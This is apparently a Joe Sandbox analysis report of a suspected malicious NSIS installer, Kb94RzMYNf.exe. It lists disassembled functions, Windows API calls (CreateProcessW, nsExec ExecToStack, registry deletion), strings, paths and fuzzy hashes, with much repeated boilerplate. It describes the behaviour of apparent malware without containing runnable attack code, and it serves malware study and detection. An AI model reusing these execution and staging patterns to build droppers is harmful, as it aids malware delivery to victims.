Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Kb94RzMYNf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Kb94RzMYNf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-1522069007
Opcode ID: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
Instruction ID: ecf8b1e823d6f98de7c15f593086dd5554d056807b59ad61161c89ef3c81dadd
Opcode Fuzzy Hash: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
Instruction Fuzzy Hash: AF51F671900216ABDB109F61DE89B9F7BB8FB54394F21413BF904B62C1C7B89D409B6C

Function 00401767 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\neoimpressionism,?,?,00000031), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\neoimpressionism,?,?,00000031), ref: 004017CD

Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Janushoveds Setup,NSIS Error), ref: 0040605D

Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,774D23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,774D23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,774D23A0), ref: 0040520A
Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A

Strings

C:\Users\user\AppData\Local\neoimpressionism, xrefs: 00401796
ExecToStack, xrefs: 00401785, 0040178E, 0040179B, 004017AD, 004017B9, 004017EF, 00401805, 00401823, 0040185F, 004018E0, 004018E9, 004018F3, 004018FE
C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll, xrefs: 0040182D, 00401849

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll$C:\Users\user\AppData\Local\neoimpressionism$ExecToStack
API String ID: 1941528284-1591583891
Opcode ID: c184a2106905ab0827f14b10fddaf5979f1bb1fc4cb028ac84f277b3ec7ab09a
Instruction ID: fa226e2697354f8a36450ecb7523776f7f82d9f29d3b914395726c71c929f9d2
Opcode Fuzzy Hash: c184a2106905ab0827f14b10fddaf5979f1bb1fc4cb028ac84f277b3ec7ab09a
Instruction Fuzzy Hash: 37418471900514BADF11BBB5CC46EAF7679EF45328F20823BF522B10E1DB3C8A519A6D

Function 004051AF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,00000000,0041C400,774D23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,774D23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,774D23A0), ref: 0040520A
SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A

Strings

Completed, xrefs: 004051D0, 004051E0, 004051E6, 00405209, 00405215

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: 00247a6464f5c3c901f3e71bb549cec16c26b63cf5655e6d63979758284adbde
Instruction ID: 3abc69651b1b947d68a29ef5f67bb3ab151c750651a003a3f474b57aa403b91e
Opcode Fuzzy Hash: 00247a6464f5c3c901f3e71bb549cec16c26b63cf5655e6d63979758284adbde
Instruction Fuzzy Hash: E6216D71900518BACB119FA5DD85ECFBFB8EF45354F14807AF944B62A0C7798A50CF68

Function 00403027 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403091
GetTickCount.KERNEL32 ref: 00403138
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403161
wsprintfW.USER32 ref: 00403174

Strings

... %d%%, xrefs: 0040316E
@, xrefs: 004030AB

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$@
API String ID: 551687249-3859443358
Opcode ID: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
Instruction ID: a151fef9e86e41fc3429002d146a23742bf049d8b35666da4da471479faf367b
Opcode Fuzzy Hash: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
Instruction Fuzzy Hash: F9517C71901219EBDB10CF65DA44BAE3BA8AF05766F10417BF815B72C0C7789A41CBAA

Function 0040567E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
GetLastError.KERNEL32 ref: 004056D5
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EA
GetLastError.KERNEL32 ref: 004056F4

Strings

C:\Users\user\Desktop, xrefs: 0040567E
C:\Users\user\AppData\Local\Temp\, xrefs: 004056A4

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-3530169944
Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
Instruction ID: dfae01ed47dc7750d2476d71b6e364c3d252909874df994a371284b211a748b1
Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
Instruction Fuzzy Hash: 18011A71D10619DADF009FA0CA447EFBFB8EF14304F00443AD549B6190E7799608CFA9

Function 004063BA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
wsprintfW.USER32 ref: 0040640C
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406420

Strings

%s%S.dll, xrefs: 00406406
UXTHEME, xrefs: 004063C3
\, xrefs: 004063E2

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
Instruction ID: 7b807a610878b0bc4ee9c08e82fc2c2c0a074289e2a27b7b834fb84ffe8ff7bb
Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
Instruction Fuzzy Hash: 09F0F670500219A7DB10AB68ED0DF9B3A6CEB00304F50443AA946F10D1EBB8DA29CBE8

Function 00405C54 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405C72
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405C8D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C59
"C:\Users\user\Desktop\Kb94RzMYNf.exe", xrefs: 00405C54
nsa, xrefs: 00405C61

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Kb94RzMYNf.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-161808582
Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
Instruction ID: 1b208e64e042baf7dbd80c3cabdcb34a7d602449cab37475291322263c582f77
Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
Instruction Fuzzy Hash: 7CF09076700708BFEB00DF59DD49A9BBBBCEB91710F10403AF940E7180E6B49A548B64

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 63d61aba69846c39a340c92fc89b84eecc01f6a36edae5aa348db2d0b7e3277e
Instruction ID: a55e164afb4a2c5db24f06852be026e23ac61ce6859740a963365f2f7f7eec81
Opcode Fuzzy Hash: 63d61aba69846c39a340c92fc89b84eecc01f6a36edae5aa348db2d0b7e3277e
Instruction Fuzzy Hash: 2F116771904119FFEF11AF90DF8CEAE3B79FB54388B10003AF905E10A0D7B49E55AA28

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
Instruction ID: 7183083e97b306686418f33f328e020de39305092e82b8c4ae23370839422ec4
Opcode Fuzzy Hash: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
Instruction Fuzzy Hash: 48219071940209BEEF01AFB5CE4AABE7B75EB44744F10403EF601B61D1D6B89A40DB68

Function 00401FC3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE

Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,774D23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,774D23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,774D23A0), ref: 0040520A
Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C

Strings

`OC, xrefs: 0040203C

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID: `OC
API String ID: 334405425-799166930
Opcode ID: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
Instruction ID: b14b73648b0fa08bf6b9a57eaf8eef0284e6afbfa2af330353af538dc438c051
Opcode Fuzzy Hash: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
Instruction Fuzzy Hash: E0218431900219EBDF20AFA5CE49A9E7E71AF04358F20427FF511B51E1CBBD8A81DA5D

Function 00405F1D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F47
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F68
RegCloseKey.KERNELBASE(?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F8B

Strings

: Completed, xrefs: 00405F20

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: : Completed
API String ID: 3677997916-2954849223
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: d8616479382e01d2a6f444a134d683a656a2531fa4940cd32d1faed75845c594
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: C701483110060AAFCB218F66ED08EAB3BA8EF44350F00403AFD44D2220D734D964CBA5

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,774D23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,774D23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,774D23A0), ref: 0040520A
Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A

Part of subcall function 00405730: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
Part of subcall function 00405730: CloseHandle.KERNEL32(?), ref: 00405766

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
